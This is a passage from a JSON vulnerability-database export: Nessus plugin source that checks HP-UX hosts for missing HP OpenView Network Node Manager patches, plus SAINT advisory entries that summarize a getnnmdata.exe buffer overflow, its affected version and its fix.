flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", 
version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-ENG-DOC\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVPMD-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVSNMP-MIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVWIN-MAN\", version:\"B.07.50.00\")) 
flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:32:18", "description": "s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server. References: CVE-2010-1964 (SSRT100026,\n ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\n CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - A potential security vulnerability has been identified\n with HP OpenView Network Node Manager (OV NNM). 
The\n vulnerability could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server.", "edition": 24, "published": "2010-05-17T00:00:00", "title": "HP-UX PHSS_40708 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1964", "CVE-2010-2709", "CVE-2010-1961", "CVE-2010-1555", "CVE-2010-1552", "CVE-2010-1960", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "modified": "2010-05-17T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40708.NASL", "href": "https://www.tenable.com/plugins/nessus/46348", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40708. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46348);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\", \"CVE-2010-1553\", \"CVE-2010-1554\", \"CVE-2010-1555\", \"CVE-2010-1960\", \"CVE-2010-1961\", \"CVE-2010-1964\", \"CVE-2010-2709\");\n script_xref(name:\"HP\", value:\"emr_na-c02153379\");\n script_xref(name:\"HP\", value:\"emr_na-c02217439\");\n script_xref(name:\"HP\", value:\"emr_na-c02446520\");\n script_xref(name:\"HP\", value:\"SSRT010098\");\n\n script_name(english:\"HP-UX PHSS_40708 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26 : \n\nThe 
remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server. References: CVE-2010-1964 (SSRT100026,\n ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\n CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - A potential security vulnerability has been identified\n with HP OpenView Network Node Manager (OV NNM). 
The\n vulnerability could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5f413ca\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f9c68a79\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?094465cf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40708 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/03\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 
2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23 11.31\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_40708 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_40708\", \"PHSS_41243\", \"PHSS_41607\", \"PHSS_41858\", \"PHSS_42233\", \"PHSS_43047\", \"PHSS_43354\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-IPV6\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", 
version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-DOC-REUS\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-ENG-DOC\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVPMD-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVSNMP-MIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVWIN-MAN\", version:\"B.07.50.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:32:18", "description": "s700_800 11.11 OV NNM7.01 
Intermediate Patch 13 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02424 SSRT080125)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2009-0898 (SSRT090101)\n CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846\n (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128,\n ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522)\n CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176\n (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132,\n ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539)\n CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180\n (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164,\n ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to allow\n execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - Potential vulnerabilities have been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerabilities could be exploited remotely to execute\n arbitrary code. (HPSBMA02416 SSRT090008)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. 
References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02425 SSRT080091)", "edition": 25, "published": "2010-05-10T00:00:00", "title": "HP-UX PHSS_40705 : s700_800 11.11 OV NNM7.01 Intermediate Patch 13", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3848", "CVE-2009-3846", "CVE-2009-3847", "CVE-2009-4177", "CVE-2009-0921", "CVE-2009-4180", "CVE-2009-3849", "CVE-2009-0898", "CVE-2009-4181", "CVE-2010-1555", "CVE-2009-4176", "CVE-2009-4178", "CVE-2010-1552", "CVE-2009-4179", "CVE-2008-2438", "CVE-2009-0920", "CVE-2010-1550", "CVE-2008-0067", "CVE-2010-1554", "CVE-2010-1553", "CVE-2009-3845", "CVE-2009-0720", "CVE-2010-1551"], "modified": "2010-05-10T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40705.NASL", "href": "https://www.tenable.com/plugins/nessus/46261", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40705. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46261);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-0067\", \"CVE-2008-2438\", \"CVE-2009-0720\", \"CVE-2009-0898\", \"CVE-2009-0920\", \"CVE-2009-0921\", \"CVE-2009-3845\", \"CVE-2009-3846\", \"CVE-2009-3847\", \"CVE-2009-3848\", \"CVE-2009-3849\", \"CVE-2009-4176\", \"CVE-2009-4177\", \"CVE-2009-4178\", \"CVE-2009-4179\", \"CVE-2009-4180\", \"CVE-2009-4181\", \"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\", \"CVE-2010-1553\", \"CVE-2010-1554\", \"CVE-2010-1555\");\n script_bugtraq_id(34738, 34812);\n script_xref(name:\"HP\", value:\"emr_na-c01646081\");\n script_xref(name:\"HP\", value:\"emr_na-c01696729\");\n script_xref(name:\"HP\", value:\"emr_na-c01723303\");\n script_xref(name:\"HP\", value:\"emr_na-c01728300\");\n script_xref(name:\"HP\", value:\"emr_na-c01950877\");\n script_xref(name:\"HP\", value:\"emr_na-c02153379\");\n script_xref(name:\"HP\", value:\"SSRT010098\");\n script_xref(name:\"HP\", value:\"SSRT080091\");\n script_xref(name:\"HP\", value:\"SSRT080125\");\n script_xref(name:\"HP\", value:\"SSRT080144\");\n script_xref(name:\"HP\", value:\"SSRT090008\");\n script_xref(name:\"HP\", value:\"SSRT090257\");\n\n script_name(english:\"HP-UX PHSS_40705 : s700_800 11.11 OV NNM7.01 Intermediate Patch 13\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 OV NNM7.01 Intermediate Patch 13 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified 
with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02424 SSRT080125)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2009-0898 (SSRT090101)\n CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846\n (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128,\n ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522)\n CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176\n (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132,\n ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539)\n CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180\n (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164,\n ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to allow\n execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - Potential vulnerabilities have been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerabilities could be exploited remotely to execute\n arbitrary code. (HPSBMA02416 SSRT090008)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. 
(HPSBMA02425 SSRT080091)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01646081\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdefacfb\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ed695dee\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01723303\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45827469\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01728300\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0bbcab1d\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?422f4693\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5f413ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40705 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", 
value:'White_Phosphorus');\n script_cwe_id(94, 119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/26\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHSS_40705 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_40705\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.01.00\")) flag++;\nif 
(hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.01.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "description": "Added: 08/23/2010 \nCVE: [CVE-2010-1554](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1554>) \nBID: [40071](<http://www.securityfocus.com/bid/40071>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management 
software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted ICount parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-085/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-08-23T00:00:00", "published": "2010-08-23T00:00:00", "id": "SAINT:34D6D846B7772CD0CF4771A13E75FC3F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_icount", "type": "saint", "title": "HP OpenView NNM getnnmdata.exe CGI ICount Parameter Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "edition": 2, "description": "Added: 08/23/2010 \nCVE: [CVE-2010-1554](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1554>) \nBID: 